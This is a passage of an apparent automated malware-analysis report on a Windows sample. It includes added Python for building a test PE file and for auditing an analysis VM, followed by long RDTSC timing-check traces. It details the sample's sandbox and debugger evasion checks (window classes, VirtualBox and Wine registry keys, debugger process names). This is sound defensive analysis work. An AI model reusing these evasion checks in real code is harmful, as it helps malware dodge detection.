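    table = 0x40 + 4 + 20 + opt_size
    data_start = (table + 40 * len(sections) + 0x1FF) & ~0x1FF
    hdr = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))       # e_lfanew = 0x40
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    hdr += struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)                # PE32 magic
    body, ptr = bytearray(), data_start
    for name, data, chars in sections:
        hdr += name.ljust(8, b"\0")[:8] + struct.pack("<IIIIIIHHI", len(data), ptr, len(data), ptr, 0, 0, 0, 0, chars)
        body += data
        ptr += len(data)
    return bytes(hdr).ljust(data_start, b"\0") + bytes(body)


def triage_sample():
    """A low-entropy .text next to a packed, RWX section with an odd name."""
    rng = random.Random(1581598)            # arbitrary fixed seed keeps this deterministic
    packed = bytes(rng.getrandbits(8) for _ in range(4096))
    code = b"\x55\x8b\xec" * 200 + b"\xc3" + b"\x00" * 400
    image = build_sample_pe([
        (b".text", code, 0x60000020),        # CODE | EXECUTE | READ
        (b"omzymeri", packed, 0xE0000040),   # INITIALIZED_DATA | EXECUTE | READ | WRITE
    ])
    return pe_sections(image)


if __name__ == "__main__":
    for s in triage_sample():
        print(f"{s['name']:<9} size={s['raw_size']:<6} entropy={s['entropy']:.3f} {','.join(s['flags'])}")
```

Running it on a real file is `pe_sections(open(path, "rb").read())`; 4096 uniformly random bytes land at about 7.95 bits per byte, which is why the report's 7.954 for a 4 KiB-scale section reads as "packed" rather than "compressed resources".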

Boot Survival

Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
Source: QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
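Taken together, the "Window searched" entries, the two registry opens and the string table above describe a fairly complete sandbox fingerprint: FindWindow against the window classes of Filemon, Regmon and Process Monitor (the report labels them "window name", but FilemonClass, RegmonClass and PROCMON_WINDOW_CLASS are window class names), RegOpenKey on HKCU\Software\Wine and on the VirtualBox ACPI table HKLM\HARDWARE\ACPI\DSDT\VBOX__, a file lookup for C:\Windows\System32\VBox*.dll, the VBoxSF service key, and a Toolhelp32 process walk for windbg.exe, wireshark.exe, procmon.exe, x64dbg.exe and ida.exe. The script below turns that list into an audit of the analysis VM itself: it mirrors each probe the sample makes and reports which ones would succeed, which is what you want to know before re-running a sample that bails out early. Added example, not the sample's or the sandbox's code. The HostProbe interface is the author's design so the decision logic can be exercised against a fake host; the real probe uses the same Windows mechanisms the sample does and only runs on Windows.

```python
"""Audit an analysis VM for the artifacts this sample probes (added example)."""
import glob
import subprocess
import sys
from dataclasses import dataclass
from typing import Callable, List, Tuple

# Window classes of Filemon, Regmon and Process Monitor (the FindWindow targets above).
WINDOW_CLASSES = ["FilemonClass", "RegmonClass", "PROCMON_WINDOW_CLASS"]
# Keys the sample opened (Wine, VirtualBox ACPI table) plus the VBoxSF service key in its strings.
REGISTRY_KEYS: List[Tuple[str, str]] = [
    ("HKCU", r"Software\Wine"),
    ("HKLM", r"HARDWARE\ACPI\DSDT\VBOX__"),
    ("HKLM", r"SYSTEM\ControlSet001\Services\VBoxSF"),
]
FILE_PATTERNS = [r"C:\Windows\System32\VBox*.dll"]
TOOL_PROCESSES = {"windbg.exe", "wireshark.exe", "procmon.exe", "x64dbg.exe", "ida.exe"}


@dataclass
class HostProbe:
    """The four host queries the audit needs; inject a fake for tests."""
    find_window: Callable[[str], bool]            # window class -> exists?
    reg_key_exists: Callable[[str, str], bool]    # (hive, subkey) -> exists?
    glob_files: Callable[[str], List[str]]        # pattern -> matching paths
    process_names: Callable[[], List[str]]        # image names of running processes


def audit(probe: HostProbe) -> List[Tuple[str, str]]:
    """Return (category, artifact) pairs the sample would find on this host."""
    found: List[Tuple[str, str]] = []
    for cls in WINDOW_CLASSES:
        if probe.find_window(cls):
            found.append(("window_class", cls))
    for hive, key in REGISTRY_KEYS:
        if probe.reg_key_exists(hive, key):
            found.append(("registry", f"{hive}\\{key}"))
    for pattern in FILE_PATTERNS:
        for path in probe.glob_files(pattern):
            found.append(("file", path))
    for name in probe.process_names():
        if name.lower() in TOOL_PROCESSES:
            found.append(("process", name.lower()))
    return found


def windows_probe() -> HostProbe:
    """Real probe: FindWindowW, RegOpenKey via winreg, a filesystem glob and a
    process list from tasklist. Windows only; never called in the test."""
    import ctypes
    import winreg
    hives = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}
    user32 = ctypes.windll.user32
    user32.FindWindowW.restype = ctypes.c_void_p

    def find_window(cls: str) -> bool:
        return bool(user32.FindWindowW(cls, None))

    def reg_key_exists(hive: str, key: str) -> bool:
        try:
            winreg.CloseKey(winreg.OpenKey(hives[hive], key))
            return True
        except OSError:
            return False

    def process_names() -> List[str]:
        out = subprocess.run(["tasklist", "/FO", "CSV", "/NH"], capture_output=True, text=True).stdout
        return [line.split('","')[0].strip('"') for line in out.splitlines() if line.startswith('"')]

    return HostProbe(find_window, reg_key_exists, glob.glob, process_names)


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("run this on the Windows analysis VM")
    hits = audit(windows_probe())
    for category, artifact in hits:
        print(f"{category:<13} {artifact}")
    print(f"{len(hits)} artifact(s) this sample could use to detect the sandbox")
```

Anything the audit prints is an artifact to rename, hide or remove before the next detonation (or to leave in place deliberately and patch the sample's check instead). The string table also names NUM_PROCESSOR, NUM_RAM, RESOLUTION_X/Y, UPTIME_MINUTES, RECENT_FILES and the Uninstall keys, so expect CPU count, memory, screen size, uptime, recent-document count and installed-application count to be fingerprinted as well; the thresholds are not visible in the report, so the audit does not guess at them.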
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1421FFD second address: 1422016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 14217F8 second address: 14217FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1594134 second address: 159413A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 159413A second address: 159413E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 159339F second address: 15933A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15933A3 second address: 15933B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F9D00F1DB5Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15933B8 second address: 15933BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15933BE second address: 15933CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB5Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15936F7 second address: 1593705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1593705 second address: 1593710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15939E6 second address: 15939EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15939EC second address: 15939F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15939F0 second address: 15939F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1596788 second address: 15967BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F9D00F1DB5Fh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9D00F1DB68h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15967BC second address: 14217F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F9D01181AAAh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 jns 00007F9D01181AA8h 0x0000001b jmp 00007F9D01181AB2h 0x00000020 popad 0x00000021 pop eax 0x00000022 jmp 00007F9D01181AB6h 0x00000027 push dword ptr [ebp+122D1451h] 0x0000002d xor dword ptr [ebp+122D1C39h], eax 0x00000033 call dword ptr [ebp+122D1CF5h] 0x00000039 pushad 0x0000003a jmp 00007F9D01181AACh 0x0000003f xor eax, eax 0x00000041 xor dword ptr [ebp+122D1B08h], ebx 0x00000047 mov edx, dword ptr [esp+28h] 0x0000004b mov dword ptr [ebp+122D1C26h], ebx 0x00000051 mov dword ptr [ebp+122D2847h], eax 0x00000057 cmc 0x00000058 mov esi, 0000003Ch 0x0000005d clc 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 cld 0x00000063 lodsw 0x00000065 jmp 00007F9D01181AAFh 0x0000006a jmp 00007F9D01181AABh 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 clc 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 ja 00007F9D01181AACh 0x0000007e pushad 0x0000007f or dword ptr [ebp+122D2271h], eax 0x00000085 mov edi, dword ptr [ebp+122D27F3h] 0x0000008b popad 0x0000008c push eax 0x0000008d pushad 0x0000008e push eax 0x0000008f push edx 0x00000090 push ebx 0x00000091 pop ebx 0x00000092 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15968FF second address: 1596905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1596905 second address: 1596934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F9D01181AB4h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9D01181AACh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1596934 second address: 1596938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1596938 second address: 159693E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 159693E second address: 1596945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1596945 second address: 1596954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1596954 second address: 159695A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 159695A second address: 1596960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1596960 second address: 1596964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1596964 second address: 1596987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F9D01181AB5h 0x00000014 jmp 00007F9D01181AAFh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1596987 second address: 159698D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 159698D second address: 1596991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1596B59 second address: 1596BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB61h 0x00000009 popad 0x0000000a jl 00007F9D00F1DB58h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 push ecx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F9D00F1DB63h 0x0000002a popad 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 popad 0x00000032 pop eax 0x00000033 or edi, dword ptr [ebp+122D287Fh] 0x00000039 lea ebx, dword ptr [ebp+124486BCh] 0x0000003f mov edi, dword ptr [ebp+122D2AE7h] 0x00000045 push eax 0x00000046 pushad 0x00000047 jmp 00007F9D00F1DB64h 0x0000004c jl 00007F9D00F1DB5Ch 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 1596C8A second address: 1596D2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 065E465Bh 0x00000010 pushad 0x00000011 call 00007F9D01181AB2h 0x00000016 mov eax, 0C80C1C1h 0x0000001b pop esi 0x0000001c push edi 0x0000001d pop eax 0x0000001e popad 0x0000001f push 00000003h 0x00000021 push 00000000h 0x00000023 jmp 00007F9D01181AB7h 0x00000028 push 00000003h 0x0000002a mov dword ptr [ebp+122D20DAh], ecx 0x00000030 push ABAE0219h 0x00000035 jno 00007F9D01181AB0h 0x0000003b add dword ptr [esp], 1451FDE7h 0x00000042 push 00000000h 0x00000044 push ebp 0x00000045 call 00007F9D01181AA8h 0x0000004a pop ebp 0x0000004b mov dword ptr [esp+04h], ebp 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc ebp 0x00000058 push ebp 0x00000059 ret 0x0000005a pop ebp 0x0000005b ret 0x0000005c lea ebx, dword ptr [ebp+124486C7h] 0x00000062 mov esi, edx 0x00000064 xchg eax, ebx 0x00000065 push eax 0x00000066 push edx 0x00000067 push edi 0x00000068 pushad 0x00000069 popad 0x0000006a pop edi 0x0000006b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15B60A0 second address: 15B60A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15B60A9 second address: 15B60AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15B6626 second address: 15B662C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15B67BB second address: 15B67C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15B68F5 second address: 15B6908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F9D00F1DB5Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15B6908 second address: 15B690E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15B690E second address: 15B6936 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9D00F1DB67h 0x0000000c je 00007F9D00F1DB56h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15B6E58 second address: 15B6E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D01181AB5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15B79F0 second address: 15B79F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15B79F4 second address: 15B7A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15B7B9D second address: 15B7BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15BD258 second address: 15BD262 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9D01181AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15BD262 second address: 15BD26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C2E97 second address: 15C2EDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F9D01181AB3h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pushad 0x0000001a jc 00007F9D01181AA6h 0x00000020 jmp 00007F9D01181AB5h 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C2EDE second address: 15C2EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnp 00007F9D00F1DB56h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop esi 0x0000000f jbe 00007F9D00F1DB62h 0x00000015 js 00007F9D00F1DB56h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C244D second address: 15C2465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D01181AB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C2465 second address: 15C2469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C2469 second address: 15C248F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F9D01181ABBh 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F9D01181AB3h 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C248F second address: 15C24B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB64h 0x00000009 jnc 00007F9D00F1DB56h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C2A16 second address: 15C2A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F9D01181AA6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C2A22 second address: 15C2A3D instructions: 0x00000000 rdtsc 0x00000002 js 00007F9D00F1DB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D00F1DB5Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C2CDF second address: 15C2CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b js 00007F9D01181AA6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C2CF0 second address: 15C2CF8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C2CF8 second address: 15C2CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C2CFE second address: 15C2D2B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F9D00F1DB56h 0x0000000d jmp 00007F9D00F1DB5Bh 0x00000012 pushad 0x00000013 popad 0x00000014 jnl 00007F9D00F1DB56h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jnl 00007F9D00F1DB56h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 15C2D2B second address: 15C2D45 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9D01181AA6h 0x00000008 jmp 00007F9D01181AB0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
